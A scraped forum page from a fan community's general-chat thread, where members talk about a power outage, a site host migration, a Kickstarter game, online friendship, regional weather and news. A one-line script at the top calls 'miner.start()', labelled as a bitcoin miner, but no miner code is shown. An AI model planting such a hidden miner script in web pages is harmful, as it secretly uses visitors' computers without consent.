<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectsmw central

talkhaus thoughts

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
Bean

Re: Twitter Thread

Postby Bean » 4 years ago

Our power was out for the last couple of days. Finally came back on just a few minutes ago. Nice to have the house cooling down for everyone's sake even if we had to throw away a lot of frozen food before it did.

GlitchedGhost

Postby GlitchedGhost » 4 years ago

Alice wrote:So for IsoNation users: The site should hopefully be back up within the next 24 hours or so if things go well. I signed up with the new host and I'm even getting the domain name transferred to them (though this step will take about 4-5 days) and I'm getting the site's files transferred over to this host right now. Though it could take up to 24 hours for the domain's DNS records to get changed to reflect the new host from what I'm reading. (Meaning that it may be up to 24 hours before you can physically access the site.) This is my first time having to transfer sites between hosts though so take that as an optimal scenario rather than a guarantee. Something I haven't predicted could very easily go wrong and make me take more time to get it set back up.
Shame you had to move, but hey, at least the site's finally coming back! :D
He captured!
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower

Alice
Pronouns: Girl person

Postby Alice » 4 years ago

GlitchedGhost wrote:Shame you had to move, but hey, at least the site's finally coming back! :D
Yeah but we're at least with a hosting service that isn't literal garbage though.

Also apparently it's already back for you, lol. So far you're the only one who can access it through the url rather than directly through the server ip. (Though transferring the domain did indeed state it could take up to 24 hours so that's not too big a surprise.)

Ashan
The world has become a place

Postby Ashan » 4 years ago

I just found out about Prey for the Gods today. Apparently it was shown off last year but I never heard about it until now. It looks very heavily inspired by Shadow of the Colossus, which I loved, so I'm all on board for a spiritual successor.

They started a Kickstarter, and you can get the game for $25, so I went ahead and did it. I don't usually back Kickstarters, but they have a lot to show for the game already, and I like the looks of it.

http://www.preyforthegods.com/

cats-on-ice
Back from the grave

Postby cats-on-ice » 4 years ago

honestly, I'm really thankful for all of you on the talkhaus. I got immersed in the community pretty quickly when I joined, and suddenly became a well known member with skypehaus and cortex.

And the biggest of hugs and appreciation to raocow, Horikawa, and sturg. Don't ever let anyone tell you you can't be friends with someone you've never met irl. Them three are easily some of the greatest friends I've had in my life and are super supportive when I'm struggling and need guidance. I'm really glad I've become friends with them, and all of you talkhausers.

sorry, I guess I'm feeling sentimental and there's also been a lot of unfortunate stuff going on in the world so I want to remind you all that you always matter to someone. Even if that someone is an 18 year old white girl from Florida that you talked to a couple times on the fan-forum of a youtube let's-player.
Image<--- I h8 u horikawa

metasomnia?
the calm before the storm
First name: Meta
Pronouns: he/him/his

Postby metasomnia? » 4 years ago

It's okay, we love you too cats

sonicspin
wishes
Banned
First name: t
Pronouns: whatever

Postby sonicspin » 4 years ago

so annoying
have a good night everybody
d̀͢͏̷͢ȩ̢͡͞͠-̸̢͟҉g̶̡͟͞҉e͞͏͞͞͠n͢҉e̸̛͠͞r͟á̡͠͡ţ̛́͜i̧̛o̵̢ń̴͠͝͝
dA

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 4 years ago

i can't deal with being stuck essentially alone for this long aghhhhhhhh
i need to be around a lot of people and i can't be and it's messing with my head
ImageImage Image ImageImageImageImageImageImage

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 4 years ago

I've been at this card shop since three this afternoon. It's 4am now :'(
That crazy voice dude

Alice

cats-on-ice wrote:Don't ever let anyone tell you you can't be friends with someone you've never met irl.
People who think that are really dumb anyways and thus not worth listening to.

Pikabread
we're gonna talk about e
First name: lily
Pronouns: she/her/xe/xem

Postby Pikabread » 4 years ago

if it weren't for my online friends I probably wouldn't still be sane, so I absolutely appreciate y'all

TaviTurnip
Reach for the top
Abministrator
First name: Rena

Postby TaviTurnip » 4 years ago

Why does every locale act the same way about their weather as if they're somehow unique

Iowa? Ireland? California? Ontario? England? Hey guys we're the ONLY PLACE who has summers too hot, winters too cold, humidity out the llama's ass, and no way to deal with it. I'm going to wear my suffering on my sleeve and make sure you absolutely understand that it's ONLY MY LOCATION that goes through this.

Seriously, there is some kind of insistence on being the victim like everyone online that people feel the need to like bold and highlight their state/country when talking about it and having no idea about their neighbors next door who go through the same thing.
I regularly stream on Twitch! with other members of the talkhaus. Come watch on Tuesdays and Saturdays if you like Splatoon, Pokémon, and other RPGs!

FancyFancy

Postby FancyFancy » 4 years ago

So that applies to the tens of thousands of Facebook friends some people have?
FILMED IN
ImageImage

raekuul
D&C 134:2
First name: Pokota
Pronouns: he/him/his

Postby raekuul » 4 years ago

Retroarch is building a Low Level Emulation graphics plugin-and-emulator set, designed around the Vulkan API - the net effect is far better accuracy and far less processing penalties. Good news if you have a GPU at least as recent as this January, irrelevant news if you don't.
I do streams sometimes
SnoruntPyro played my MaGLX2 level
And now to reveal my rejected names: Darth Vader's Tough Savannah Mansion in Canada's Chapter

Mata Hari

Postby Mata Hari » 4 years ago

I need to do something today probably

Alice

Mata Hari wrote:I need to do something today probably
Doing things is overrated.

Bean

Mata Hari wrote:I need to do something today probably
You and me both. I know what I want to do, but it's a time sink. Guess I better do something else in the meantime while I have some free time for a change. It's been a while.

Mata Hari

Postby Mata Hari » 4 years ago

I did go outside and I ate a lot of meats :0

TheFinalSentinel
Low rates,%Percent%signs%, I dunno
First name: £ٌœ'ƒھ‡ح¼円Qف-‹";ôىù♪ïظ§»ھ

Postby TheFinalSentinel » 4 years ago

SoftBank bought out ARM.
(Read: Computer nerd stuff happened.)

This is... a really big move.

Ashan
The world has become a place

Postby Ashan » 4 years ago

I can't believe how many people honestly argue that defining a mass shooting as "4 or more people shot" is absurd.

If you think near daily incidents of 4 or more people being shot in the US is not an issue, you obviously just do not care. I suppose if you're to the point of arguing the semantics of a mass shooting, it should already be assumed that you don't care.

Bean

See, the problem with America and guns is that most people put the weapons over the people. Totally need an amendment on that Second Amendment because too many stupid people have access to them now and light up the night over and over. Doesn't help that the NRA spends way too much time talking and when challenged, go silent. Case in point, they shut up after two black people were executed recently in back-to-back days but quickly spoke out when Dallas, also a disgusting situation, happened.

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 4 years ago

finally got around to watching steven universe and i have been routinely emotionally compromised since yesterday as a result so that's fun
ImageImage Image ImageImageImageImageImageImage

Sasquatch
Don't mess with sasquatch

Postby Sasquatch » 4 years ago

TaviTurnip wrote:Why does every locale act the same way about their weather as if they're somehow unique

Iowa? Ireland? California? Ontario? England? Hey guys we're the ONLY PLACE who has summers too hot, winters too cold, humidity out the llama's ass, and no way to deal with it. I'm going to wear my suffering on my sleeve and make sure you absolutely understand that it's ONLY MY LOCATION that goes through this.

Seriously, there is some kind of insistence on being the victim like everyone online that people feel the need to like bold and highlight their state/country when talking about it and having no idea about their neighbors next door who go through the same thing.
I'm irritated by people who talk about a state/district/country/etc. as if it has only one climate. Oregon and Washington, for example, are famous for cool, rainy weather and huge evergreens. Except, the eastern halves of both states are practically deserts, or at least way drier than anything west of the Cascades. Even in the wettest parts of the states, summer is bone-dry. Oh, and some people literally think that Washington has the worst climate in the country because it's so rainy in the winter. Most areas have crappy weather during some part of the year. The Midwest and most of Canada have bone-chilling winters and the South and Southwest have miserable summers. All in all, the Northwest (at least the Willamette Valley and Puget Lowlands) has probably the best climate in North America: not much snow and dry, comfortable summers. I just wish we actually got thunderstorms once in a while.

TaviTurnip
Reach for the top
Abministrator
First name: Rena

Postby TaviTurnip » 4 years ago

Sasquatch wrote:I'm irritated by people who talk about a state/district/country/etc. as if it has only one climate. Oregon and Washington, for example, are famous for cool, rainy weather and huge evergreens. Except, the eastern halves of both states are practically deserts, or at least way drier than anything west of the Cascades. Even in the wettest parts of the states, summer is bone-dry. Oh, and some people literally think that Washington has the worst climate in the country because it's so rainy in the winter. Most areas have crappy weather during some part of the year. The Midwest and most of Canada have bone-chilling winters and the South and Southwest have miserable summers. All in all, the Northwest (at least the Willamette Valley and Puget Lowlands) has probably the best climate in North America: not much snow and dry, comfortable summers. I just wish we actually got thunderstorms once in a while.
You're speaking my language.

I get reeeally irritated when people ask "what time is it in Canada" or "how's the weather in the States" when like... we have six timezones? >_> And enough landmass to probably house every human on the planet. And it doesn't help that actual native Canadians talk about the time/weather here like there is only one, which basically just spreads the misinformation further. It is a huge pet peeve of mine. At least people in Edmonton and Calgary have the decency to specify that their winters specifically are worse than most peoples', bless their poor bones for having to deal with that elevation, but at least they know it's local to them :I
I regularly stream on Twitch! with other members of the talkhaus. Come watch on Tuesdays and Saturdays if you like Splatoon, Pokémon, and other RPGs!

pholtos
Loves adorable things.

Postby pholtos » 4 years ago

The central is a vortex of wack-o weather that changes on a dime. Anywhere else in the US like that?
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

Return to “the gazebo”